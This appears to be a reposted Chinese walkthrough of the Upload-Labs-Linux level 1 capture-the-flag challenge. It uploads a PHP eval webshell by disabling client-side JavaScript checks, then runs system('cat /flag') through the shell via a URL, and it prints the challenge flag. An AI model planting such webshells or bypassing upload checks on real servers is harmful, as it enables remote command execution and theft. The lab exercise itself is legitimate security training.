当前位置:   article > 正文

Upload-Labs-Linux_upload-labs-linux 1

upload-labs-linux 1

靶场教程

1.访问页面,文件上传靶场。
image.png
2.编写一句话木马上传。另存为【PHP】文件

<?php eval($_POST['upfile']); ?>   需要POST请求访问
修改为
<?php eval($_REQUEST['upfile']); ?>   可以在url直接访问
  • 1
  • 2
  • 3

image.png
3.发现报错,不允许上传.php文件。
image.png
4.查看源码,禁用JavaScript ,并删除该内容。
image.png
注:禁用 JavaScript 可使用插件
image.png
5.文件上传成功,访问路径。
image.png
6.获取 flag , 修改后的一句话木马,可直接访问以下 url 获取 flag

http://e24d2149-d2bd-41e0-8d4a-697f1cfb6a9e.node5.buuoj.cn:81/upload/upfile.php?upfile=system("cat /flag");

flag{17cbbe6d-8422-44a3-a2db-17d3eee8d502} 
  • 1
  • 2
  • 3

image.png

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/代码探险家/article/detail/848566
推荐阅读
相关标签
  

闽ICP备14008679号